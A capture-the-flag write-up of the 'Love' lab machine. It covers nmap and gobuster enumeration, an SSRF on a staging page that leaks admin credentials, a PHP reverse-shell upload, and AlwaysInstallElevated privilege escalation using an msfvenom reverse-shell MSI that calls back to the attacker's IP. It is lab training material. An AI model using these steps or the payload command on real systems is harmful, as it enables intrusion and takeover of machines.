# Love (Easy) ## Enumeration ### Nmap ``` nmap -sC -sV 10.10.10.239 ``` ``` Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-31 02:53 EDT Nmap scan report for www.love.htb (10.10.10.239) Host is up (0.16s latency). Not shown: 993 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: Voting System using PHP 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: 403 Forbidden | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in | Not valid before: 2021-01-18T14:00:16 |_Not valid after: 2022-01-18T14:00:16 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LPDString, NULL, RPCCheck, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe: |_ Host '10.10.16.4' is not allowed to connect to this MariaDB server 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: 403 Forbidden 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.91%I=7%D=5/31%Time=60B487E9%P=x86_64-pc-linux-gnu%r(NU SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowe SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines, SF:49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,49,"E SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\ SF:x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,49,"E\0\0 SF:\x01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20c SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,49,"E\0\0\x01 SF:\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20conne SF:ct\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,49,"E\0\0\x01\xffj\x SF:04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20t SF:o\x20this\x20MariaDB\x20server")%r(DNSVersionBindReqTCP,49,"E\0\0\x01\x SF:ffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect SF:\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusRequestTCP,49,"E\0\0\x SF:01\xffj\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20con SF:nect\x20to\x20this\x20MariaDB\x20server")%r(Help,49,"E\0\0\x01\xffj\x04 SF:Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\ SF:x20this\x20MariaDB\x20server")%r(TerminalServerCookie,49,"E\0\0\x01\xff SF:j\x04Host\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x SF:20to\x20this\x20MariaDB\x20server")%r(Kerberos,49,"E\0\0\x01\xffj\x04Ho SF:st\x20'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2 SF:0this\x20MariaDB\x20server")%r(SMBProgNeg,49,"E\0\0\x01\xffj\x04Host\x2 SF:0'10\.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this SF:\x20MariaDB\x20server")%r(X11Probe,49,"E\0\0\x01\xffj\x04Host\x20'10\.1 SF:0\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20Mar SF:iaDB\x20server")%r(FourOhFourRequest,49,"E\0\0\x01\xffj\x04Host\x20'10\ SF:.10\.16\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20M SF:ariaDB\x20server")%r(LPDString,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.1 SF:6\.4'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB SF:\x20server"); Service Info: Hosts: www.example.com, LOVE; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 21m33s, deviation: 0s, median: 21m32s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-05-31T07:15:18 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 43.02 seconds ``` so many ports opened :) yeah Windows machine. Before that, we can see that some subdomains i listed here **staging.love.htb** ``` ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in ``` Let's put it in **/etc/hosts** file ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb00fjcvQPXOwvhZvKq%2F-Mb0NI7UTshfi6PtBSmU%2Fimage.png?alt=media\&token=00730401-9959-40eb-b678-838c1248ebf7) Ok lets start enumerating :) ### Gobuster ``` gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.239/ ``` ``` =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://10.10.10.239/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/05/31 03:58:19 Starting gobuster =============================================================== /images (Status: 301) /Images (Status: 301) /admin (Status: 301) /plugins (Status: 301) /includes (Status: 301) /dist (Status: 301) /licenses (Status: 403) /IMAGES (Status: 301) /%20 (Status: 403) Progress: 4881 / 220561 (2.21%)^C [!] Keyboard interrupt detected, terminating. =============================================================== 2021/05/31 03:59:08 Finished =============================================================== ``` We can see there are some directory that might can be accessed. ### Web Enumeration When we go to port 80, we can see there is a form to login. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0OUROEjMv6F33_1Nz%2Fimage.png?alt=media\&token=26ed42c3-36a5-4234-b034-bdeb1c498931) Then we go to port 5000 and got this forbidden message ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0OcoVWZL8zZgKw3VP%2Fimage.png?alt=media\&token=d9d8b664-deee-4f75-ab79-246875f13664) Lets navigate to **staging.love.htb** ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0PUBqJZdIyNIFNAU3%2Fimage.png?alt=media\&token=4064bb8a-f888-438d-a19d-e5bac0a6ea25) wow got a completely new page, lets navigate to **demo** page ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0PdsMiYlI6B1epuoz%2Fimage.png?alt=media\&token=e93ddf26-20ca-475b-a89f-c6e0ffcbe217) We can see we can specify a URL to scan, after few tries, we realized that it might have SSRF vulnerability. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0Q3ka7oUUhElgwtZ3%2Fimage.png?alt=media\&token=74f47c96-fb24-4aec-93df-d7bc4f39b495) Port 80 does nothing, let's try port 5000 which give us forbidden just now. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0QH1D4JT7I_f959W-%2Fimage.png?alt=media\&token=d2d4d822-5f8d-4d0e-9170-b378940866c0) wow credentials !! Lets navigate to **/admin** at port 80 to login ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0RRj6C3O-NIHPvIqG%2Fimage.png?alt=media\&token=e9bcda54-322d-42c5-b768-6a252b4acc0c) Now, we can try to upload a shell. ## Reverse Shell ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0RXWSXu1UEvau4HBp%2Fimage.png?alt=media\&token=4f4a0b5d-5a28-4444-baaa-5f65176ff3e1) We can upload a reverse shell here. Since it does not check for file extension. After that, the file will be stored at **/Images** > Note: We need to use Windows reverse shell as the Linux version of course will not work :) > > Link to download Windows reverse shell file: [Here](https://github.com/ivan-sincek/php-reverse-shell) ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0S9V1x4_jGOFZj8fN%2Fimage.png?alt=media\&token=c0b4f659-417c-4af1-8146-3cd52750c147) We can change the IP and port at the end of the file and upload it! ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0SLo_NQE4aAZuY72o%2Fimage.png?alt=media\&token=42185bfa-7541-4e65-960d-b2234204f37f) We can see there is a reverse shell file uploaded. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0SUOXiMZGUT_gPZLd%2Fimage.png?alt=media\&token=c797e8e2-4204-4774-be30-cbf323ccfb15) Finally, we have a user shell ! ## Privilege Escalation Then we can run winPEAS to find what is the vulnerability. After searching for awhile, then we found this vulnerability ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0UeOrpaBPLl9hnswC%2Fimage.png?alt=media\&token=067aa397-ecb7-4422-9841-248e33dfe3db) After Googling for some time, we found this [article](https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/). We can use the method 1 that listed inside the article by building a injection file using msfvenom ``` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=5555 -f msi -o reverse.msi ``` ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0Vxij48qQSNR6PBGZ%2Fimage.png?alt=media\&token=bcf1a916-34d3-42cc-b95a-95cc64a00127) After we created this file and we can sent it over to the victim machine. After that we can spawn another reverse shell. ![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-Mb0NMz1U2z_J17VTcWu%2F-Mb0_NjxJWdovcZi47xc%2Fimage.png?alt=media\&token=bbda8da4-20c7-40ce-aad9-e23bc34454d9) ayy root. Congratz.